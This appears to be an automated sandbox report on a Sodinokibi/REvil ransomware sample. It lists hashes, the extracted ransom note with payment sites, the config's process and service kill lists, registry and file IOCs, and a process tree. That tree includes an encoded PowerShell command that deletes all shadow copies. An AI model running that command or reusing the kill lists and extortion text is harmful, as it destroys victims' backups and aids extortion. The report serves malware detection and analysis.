General
Target

cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

Filesize

204KB

Completed

24-01-2022 01:14

Task

behavioral1

Score
10/10
MD5

12d2c87f6184659aeba6189dd828e062

SHA1

0b1f505a6458053f5e18fc8677b748985f669926

SHA256

cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862

SHA512

9472e0fe4ecc4afad8aa33f86fbbc0aa53003d880d12921bb0b9156d77758474fb6ccb25d175b750162abe1ebc3ea18e33f6d3898fc927afef0979c64274e4e6

Malware Config

Extracted

Path

C:\704555u-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 704555u. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD5299385D96D435 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/FD5299385D96D435 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: ykr+33eN9ObSq/GN0e9GPOiG303KsoW0FPS8fVuoAZFOTpQxeuYesKQ/dZ84b9PV eBJ20aOnzhkh5P1/q0D+uJubSR0mjaSpWVwsS57LsWa7jQ1OVPQ5Dw5z2ard5bQF uIc562JISdo0bbKV5UI0y216rxNnsUpqXGOnIhC1NT7VK4N1mO/mnU4WOXuyjpoW 0/Z6v8eYKjF6E8PLt/KuyHc3pfD6315awArZABUUdnMPmH3V3X2sb+8aG33iMDBD LmMT30dBmM27wyVr553T7gDdJpao5iwI2m5iCAjC2BXYa63RFGQmin1/CBvGgPbN nmQLzx6tRuDr/Qh9BwvMXKZHyiCw+TlYVb5YULie7Vns5qn6F4LKXLSRK3j31I19 9s42fglglXV7vn8Q+0Qs872U0nrORsGpEe7kN2NBVKW3LLcrG4iTfkGWmvwrU3TT d0VbkP1MofC3WZ3m1J/gb231RIpnxav9hpqfeGdtLkXFIKsA+Zc0JUPPiahbnNoU ngMy1HtyQ5GVW664kBn8/KJuFaqnei5vRvCV+XttgYb96uYZUBfJHrKenqqxiSn8 Wx9TSozGaqnCDXc0beLohy8O4vbXIdb1mWIKKN78z8RV6dsTQwjl0tlF+M/bg9Mn VYlX3JLSfFU8dgQX+H5kqALeRfXHKNoVJTPdxiusNrgq4ezgYszJehMGQ3CaJ4vT FTw8G21ufhLby1u7EI7X4cawNpMz98d6YumLZsyxQJ7CIdVxj5KkpXai8fVOF568 xxQJb4I58qpaOPlIJxAYUvGP/qIZ1iqo2vet6wdQKuz2J4SsM1orkEZnDpy83k1l BfFwnqJ7o5RhuffXkxBjiPSHHdMRJ7vP6qqcg+hdyh2zv4F2uAe+yVHzNathtOL7 70HGahYuODDrEvonbgb+8icpBCnXIDUUZPGkji6GFpBX+MTbH8CORp6jdtstgARj Q3CcyDI80qvW+T5N+KQSkFF5RvyZ3fW6FIEvLZEy2jr1aB4hBFaQ2q44zJJuflSM Md+2UxJ8FhYnjxO754CVSE5YgX8SyJkM6t+Kr3G9nXwE0dl74fTXW/Lbhre3ZMVy d+pxSqF73nH4CnxSMT5YG7vq70OOaogG6ZKEYEo8Pyn82Mf72WKg9tnRkqRXpq62 uZU= Extension name: 704555u ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD5299385D96D435

http://decryptor.top/FD5299385D96D435

Extracted

Family

sodinokibi

Botnet

19

Campaign

99

C2


Attributes
net
true
pid
19
prc
firefoxconfig
infopath
steam
sqbcoreservice
mysqld_nt
oracle
mydesktopqos
msftesql
sqlbrowser
thebat
isqlplussvc
ocssd
sqlwriter
sqlagent
thunderbird
mysqld_opt
winword
wordpad
thebat64
visio
dbsnmp
msaccess
mydesktopservice
ocautoupds
ocomm
encsvc
excel
agntsvc
mysqld
synctime
tbirdconfig
outlook
mspub
onenote
xfssvccon
dbeng50
powerpnt
sqlservr
ransom_oneliner
All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions
ransom_template
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. 
From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
sub
99
svc
veeam
vss
memtas
sophos
svc$
mepocs
backup
sql
Signatures 18

  • Modifies system executable filetype association
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    TTPs

    Modify Registry, Change Default File Association

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Neshta

    Description

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Description

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Executes dropped EXE
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    pid | process
    1540 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Modifies extensions of user files
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Description

    Ransomware generally changes the extension on encrypted files.

    Reported IOCs

    description | ioc | process
    File renamed | C:\Users\Admin\Pictures\WaitJoin.crw => \??\c:\users\admin\pictures\WaitJoin.crw.704555u | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Loads dropped DLL
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    pid | process
    780 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    780 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    780 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    TTPs

    Data from Local System, Credentials in Files
  • Enumerates connected drives
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Description

    Attempts to read the root path of hard drives other than the default C: drive.

    TTPs

    Query Registry, Peripheral Device Discovery, System Information Discovery

    Reported IOCs

    description | ioc | process
    File opened (read-only) | \??\N: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\T: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\A: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\F: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\H: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\I: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\J: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\M: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\V: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\W: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\X: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\Z: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\B: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\G: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\O: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\R: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\U: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\D: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\K: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\Q: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\Y: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\E: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\L: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\P: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only) | \??\S: | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Drops file in System32 directory
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Sets desktop wallpaper using registry
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    TTPs

    Defacement, Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\h4x6jsi003.bmp" | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Drops file in Program Files directory
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe, cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\PROGRA~2\WINDOW~1\WinMail.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\INTERN~1\ieinstal.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\MSTORE.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\WINDOW~1\wab.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\WI54FB~1\wmprph.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Oarpmany.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\INTERN~1\iexplore.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MOZILL~1\UNINST~1.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\Adobe\READER~1.0\Reader\A3DUTI~1.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\FLTLDR.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\INFOPATH.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\VPREVIEW.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File created | \??\c:\program files (x86)\704555u-readme.txt | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\OIS.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\Adobe\READER~1.0\Resource\Icons\SC_REA~1.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\TextConv\WksConv\Wkconv.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\CNFNOT32.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\Setup.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\ResumeAdd.mp4 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\StartBackup.odt | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File created | \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\704555u-readme.txt | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\GROOVEMN.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\MSQRY32.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\WI54FB~1\wmplayer.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\Adobe\READER~1.0\Reader\ADOBEC~1.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOXMLED.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\SplitInstall.midi | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File created | \??\c:\program files (x86)\microsoft sql server compact edition\704555u-readme.txt | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\MSOUC.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\ONENOTE.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\WI4223~1\sidebar.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\ConnectClear.ram | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\RedoUnpublish.DVR | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\XLICONS.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\DW\DW20.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\ink\mip.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\LockConnect.vstm | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBEU~1.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\CopyStop.3g2 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\StepPush.xla | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\JoinInstall.xlsb | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\ProtectEdit.pcx | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\1033\ONELEV.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\ODeploy.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File created | \??\c:\program files\704555u-readme.txt | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\WI54FB~1\wmpconfig.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\WINDOW~2\ACCESS~1\wordpad.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\Adobe\READER~1.0\Reader\ACROBR~1.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\ACCICONS.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\SELFCERT.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOICONS.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\RemoveSync.doc | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~3\PACKAG~1\{F4220~1\VC_RED~1.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | \??\c:\program files\PublishJoin.scf | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\GRAPH.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\WI54FB~1\wmpshare.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\SOURCE~1\OSE.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\MICROS~1\Office14\MSOSYNC.EXE | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification | C:\PROGRA~2\WI54FB~1\wmlaunch.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Drops file in Windows directory
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\svchost.com | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies registry class
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Modifies system certificate store
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    TTPs

    Install Root Certificate, Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Suspicious behavior: EnumeratesProcesses
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe, powershell.exe

    Reported IOCs

    pid | process
    1540 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    452 | powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe, vssvc.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 452 | powershell.exe
    Token: SeBackupPrivilege | 1100 | vssvc.exe
    Token: SeRestorePrivilege | 1100 | vssvc.exe
    Token: SeAuditPrivilege | 1100 | vssvc.exe
  • Suspicious use of WriteProcessMemory
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe, cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    description | pid | process | target process
    PID 780 wrote to memory of 1540 | 780 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    PID 780 wrote to memory of 1540 | 780 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    PID 780 wrote to memory of 1540 | 780 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    PID 780 wrote to memory of 1540 | 780 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    PID 1540 wrote to memory of 452 | 1540 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe | powershell.exe
    PID 1540 wrote to memory of 452 | 1540 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe | powershell.exe
    PID 1540 wrote to memory of 452 | 1540 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe | powershell.exe
    PID 1540 wrote to memory of 452 | 1540 | cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe | powershell.exe
Processes 5
  • C:\Users\Admin\AppData\Local\Temp\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    "C:\Users\Admin\AppData\Local\Temp\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe"
    Modifies system executable filetype association
    Loads dropped DLL
    Drops file in Program Files directory
    Drops file in Windows directory
    Modifies registry class
    Suspicious use of WriteProcessMemory
    PID:780
    • C:\Users\Admin\AppData\Local\Temp\3582-490\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe"
      Executes dropped EXE
      Modifies extensions of user files
      Enumerates connected drives
      Drops file in System32 directory
      Sets desktop wallpaper using registry
      Drops file in Program Files directory
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID:452
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    PID:1232
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    Suspicious use of AdjustPrivilegeToken
    PID:1100
Network
MITRE ATT&CK Matrix
Command and Control
Credential Access
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Privilege Escalation
